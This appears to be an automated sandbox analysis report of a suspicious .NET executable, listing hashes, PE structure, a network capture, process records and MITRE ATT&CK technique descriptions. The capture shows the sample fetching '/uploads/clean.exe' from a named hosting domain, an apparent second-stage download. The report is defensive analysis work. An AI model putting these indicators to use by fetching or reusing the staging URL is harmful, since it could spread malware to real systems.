Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="617947" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421608961424804
Encrypted:	false
SSDEEP:	6144:FSvfpi6ceLP/9skLmb0OTTWSPHaJG8nAgeMZMMhA2fX4WABlEnN50uhiTw:MvloTTW+EZMM6DFyT03w
MD5:	B7B2703DA8023004DD579810CEDDE0B1
SHA1:	64672B97E874776E0E72E764D605CD8DACF2CAFA
SHA-256:	9380D8185C3D896C85884C5862F21E18848F14454CE720515A0A8FB6C9AE25CB
SHA-512:	87EBBE570B8F9ACA2F2E3B88F4139C91EB237386A1F0CEE2A1E568028EB8CE5EB8F67C51C54066DCC7266487E81BAC063998DD25622F6ADD9A04028B1AEC6D64
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.\|...G..............................................................................................................................................................................................................................................................................................................................................]...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.581328681783163
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	iGxCM2I5u9.exe
File size:	288'768 bytes
MD5:	8c6fb38b219a123b9340465b8d2dd5f8
SHA1:	35242280f551684b9e47726d5f94f1615c0dc76e
SHA256:	2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c
SHA512:	dd33b0934cfb262862b388b843c2ff13637c0cc1b75b7e7a8cb1640a3d39066e9681137b6ff68545eeb9a0850f23c24b470963520852f51d8644cd9de74768dd
SSDEEP:	6144:VvzIeMWcsLDGfFYiudGV0LkB/dQs7XJBCIX8boS7ZS/5iEl:V7xH5upVB+4XJBCIXc7O5i
TLSH:	4E542B3BABE54805F1EE9A7DCD9E1B62CB65D1022805B353BA436166AD01FFCEC0B0D5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}............."...0..^...........}... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x447dce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9A13B17D [Thu Nov 30 18:31:25 2051 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x47d74	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x48000	0x5ae	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x45dd4	0x45e00	27daab8f368ecf41af2b6118b0468c64	False	0.4570557077370304	data	5.595000262158807	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x48000	0x5ae	0x600	8868a3744e55c20cd447f55a71c0cfe6	False	0.423828125	data	4.075422995246891	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4a000	0xc	0x200	e9e66b5e7836ecf366f34ef7d9162967	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x480a0	0x324	data			0.43407960199004975
RT_MANIFEST	0x483c4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 13:04:57.781564951 CET	49704	443	192.168.2.5	84.32.84.122
Dec 5, 2024 13:04:57.781609058 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:57.781740904 CET	49704	443	192.168.2.5	84.32.84.122
Dec 5, 2024 13:04:57.824556112 CET	49704	443	192.168.2.5	84.32.84.122
Dec 5, 2024 13:04:57.824577093 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:59.054481030 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:59.054599047 CET	49704	443	192.168.2.5	84.32.84.122
Dec 5, 2024 13:04:59.059197903 CET	49704	443	192.168.2.5	84.32.84.122
Dec 5, 2024 13:04:59.059209108 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:59.059469938 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:59.114836931 CET	49704	443	192.168.2.5	84.32.84.122
Dec 5, 2024 13:04:59.157887936 CET	49704	443	192.168.2.5	84.32.84.122
Dec 5, 2024 13:04:59.199341059 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:59.495481014 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:59.499412060 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:59.499479055 CET	49704	443	192.168.2.5	84.32.84.122
Dec 5, 2024 13:04:59.499496937 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:59.499511003 CET	443	49704	84.32.84.122	192.168.2.5
Dec 5, 2024 13:04:59.499563932 CET	49704	443	192.168.2.5	84.32.84.122
Dec 5, 2024 13:04:59.524352074 CET	49704	443	192.168.2.5	84.32.84.122

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 13:04:57.341284990 CET	53357	53	192.168.2.5	1.1.1.1
Dec 5, 2024 13:04:57.773869991 CET	53	53357	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 13:04:57.341284990 CET	192.168.2.5	1.1.1.1	0x5e7e	Standard query (0)	orange-loris-425181.hostingersite.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 13:04:57.773869991 CET	1.1.1.1	192.168.2.5	0x5e7e	No error (0)	orange-loris-425181.hostingersite.com	free.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 13:04:57.773869991 CET	1.1.1.1	192.168.2.5	0x5e7e	No error (0)	free.cdn.hstgr.net		84.32.84.122	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

orange-loris-425181.hostingersite.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	84.32.84.122	443	6420	C:\Users\user\Desktop\iGxCM2I5u9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 12:04:59 UTC	104	OUT	GET /uploads/clean.exe HTTP/1.1 Host: orange-loris-425181.hostingersite.com Connection: Keep-Alive
2024-12-05 12:04:59 UTC	392	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Dec 2024 12:04:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding last-modified: Wed, 11 Jan 2023 12:29:40 GMT etag: W/"999-63beabb4-5b41a25ab194c3b4;gz" platform: hostinger panel: hpanel x-turbo-charged-by: LiteSpeed Server: hcdn x-hcdn-request-id: 141d270770133aca7f524af2d72e23ad-bos-edge1
2024-12-05 12:04:59 UTC	977	IN	Data Raw: 39 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e Data Ascii: 999<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/n
2024-12-05 12:04:59 UTC	1369	IN	Data Raw: 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 6d 65 64 69 61 3d 22 61 6c 6c Data Ascii: nt="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all
2024-12-05 12:04:59 UTC	123	IN	Data Raw: 20 6e 6f 74 20 61 20 66 61 75 6c 74 2c 20 6a 75 73 74 20 61 6e 20 61 63 63 69 64 65 6e 74 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: not a fault, just an accident that was not intentional.</p> </div> </div></body></html>0

Target ID:	0
Start time:	07:04:55
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\iGxCM2I5u9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\iGxCM2I5u9.exe"
Imagebase:	0x1ec7ce90000
File size:	288'768 bytes
MD5 hash:	8C6FB38B219A123B9340465B8D2DD5F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:04:59
Start date:	05/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6420 -s 2096
Imagebase:	0x7ff67d450000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FF848F4B316 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cafb45c465b50d726e90818475cc393f5a359da64447af755e31dcd330cad32d
Instruction ID: e656dc2fac4cace4f1af8a09b08ea8e802645bbb25825acd5bfd63e47a4cf2e1
Opcode Fuzzy Hash: cafb45c465b50d726e90818475cc393f5a359da64447af755e31dcd330cad32d
Instruction Fuzzy Hash: C5F1A23091CA8D8FEBA8EF28CC557E977D1FF64350F04426AD84DC7296DB3899458B81

Function 00007FF848F4C0C2 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8a603ac51a8ba28f271a013813bfcea24947a3da341acd90ac83679e6462db
Instruction ID: 5a477dde2fdf7c6ceb0e97b427e1e3872b816bd531a7fbf4f3b87a465c5c8982
Opcode Fuzzy Hash: fd8a603ac51a8ba28f271a013813bfcea24947a3da341acd90ac83679e6462db
Instruction Fuzzy Hash: C6E1903090CA8E8FEBA8EF28C8557F977D1FF64750F04426AD84DC7291DB78A9448B81

Function 00007FF848F48C0C Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a61c364f587cfea476c4e0917eb1347989a935cb7eb9d2689fc5bfe5cb62e2
Instruction ID: 28765166e3f861d4aca2c1ebdabd9035940b65bfea0f9366f2ddc2e1611c50f0
Opcode Fuzzy Hash: d2a61c364f587cfea476c4e0917eb1347989a935cb7eb9d2689fc5bfe5cb62e2
Instruction Fuzzy Hash: 00516031919A1C8FDB54EB58D845BE9BBF1FB59310F0082ABD44DE3252DF34A9858F81

Function 00007FF848F45955 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85afbf19c70afa71a4bfa58c1b4be02b86e4cbda7aec291253be8abcd228b485
Instruction ID: 2a34308fe51268f527cb5194eedabe66c62ea11c1df99a876f2df4f0aeff3bef
Opcode Fuzzy Hash: 85afbf19c70afa71a4bfa58c1b4be02b86e4cbda7aec291253be8abcd228b485
Instruction Fuzzy Hash: 2A517C3184E7C54FE743ABB888654997FB0EF27660B4901EBC085CB5A3D65D184AC722

Function 00007FF848F45D68 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1c771fe43a3bbe2a83dfdc6c9cae0f013e2ac6e62e443b4b54684be1bf02546
Instruction ID: d86bf87beee8cc510335e0fc5ffcee523c6bbc16f0970dca5348d805eb69351d
Opcode Fuzzy Hash: f1c771fe43a3bbe2a83dfdc6c9cae0f013e2ac6e62e443b4b54684be1bf02546
Instruction Fuzzy Hash: E7411230A1DA460FE355B7B8885A2B97AD2EF59B94F9501BEC00ED76D3DE2D7C028305

Function 00007FF848F47D9B Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c02de0060c57ebdbdb7ac692a22ab7bc72383a61988caf3e9965ba488aac57e
Instruction ID: 2ba8675da4982a6cb9716e5081f9cb8b657c9c3c676bd07dda4607b2ff614b98
Opcode Fuzzy Hash: 7c02de0060c57ebdbdb7ac692a22ab7bc72383a61988caf3e9965ba488aac57e
Instruction Fuzzy Hash: E1316D31B1DD0D4FEB99FB6C94551BCB7D2EFA8A51B4001BAE00ED72D2EF29AC018644

Function 00007FF848F45B29 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9438a52bbf063c2e946b4bc65d409eb0b340bd3104e332059d9c3d7f4891fd87
Instruction ID: 1ec9eb93f5326055360d4bf5d31ee9a5b2b8d87c9b2e5c1511ddb45caa4a5f17
Opcode Fuzzy Hash: 9438a52bbf063c2e946b4bc65d409eb0b340bd3104e332059d9c3d7f4891fd87
Instruction Fuzzy Hash: 05F0F67080E7C96FC313EBB48C6949A3FF5DE536A074601EBE045CBAA2E51C4C05C752

Function 00007FF848F47B3E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a48acc678a69f5d4e06615047a5a27977a35186523f335287acc200a1bc2641
Instruction ID: 7513b5515ee9c93b4f30d1cc2253afc143a186cf9e1c2c6259a31c0c925b1461
Opcode Fuzzy Hash: 6a48acc678a69f5d4e06615047a5a27977a35186523f335287acc200a1bc2641
Instruction Fuzzy Hash: 91F0B43071D90A5FE680F7ACD8417B973C1DF546A0F80047AE40DC36D5EE5DA8428341

Function 00007FF848F45B9C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b3140873859e0126ca202ea1dc7a3fe07648903cdf1e5f7377a2cab326f5f42
Instruction ID: 4df641d59b08f5f8f8c4c4d1f1f441ace15424ec86590a7f12d1e91295c86f8a
Opcode Fuzzy Hash: 0b3140873859e0126ca202ea1dc7a3fe07648903cdf1e5f7377a2cab326f5f42
Instruction Fuzzy Hash: 45E0EC20B1BA492FD785FBAC54956AC6BD2DF58690F50047A900DD7692DE2C68418705

Function 00007FF848F47AC0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ef109420d42dfa5caea97c09ab0980e6548adb04bbbb0eb26d547bc0d983fa
Instruction ID: 03e51a047bfbb9c3cbae6fcfd4253e74703d69dd8e9c2b2548330be60f801511
Opcode Fuzzy Hash: 83ef109420d42dfa5caea97c09ab0980e6548adb04bbbb0eb26d547bc0d983fa
Instruction Fuzzy Hash: 1DD097B087F50A0FCA0ABBFA4C022907792DF12090FC480B8C88583AE2E30F0C4B43C1

Function 00007FF848F47AE6 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9105b7bd5071a736ccb6d4dbec45c9db5f0d634b36933cae1adff0067da0591
Instruction ID: 635798bc686bad019028f8e3f9ca04029e00c3ccdf2206baf437b4cb79ab7786
Opcode Fuzzy Hash: b9105b7bd5071a736ccb6d4dbec45c9db5f0d634b36933cae1adff0067da0591
Instruction Fuzzy Hash:

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
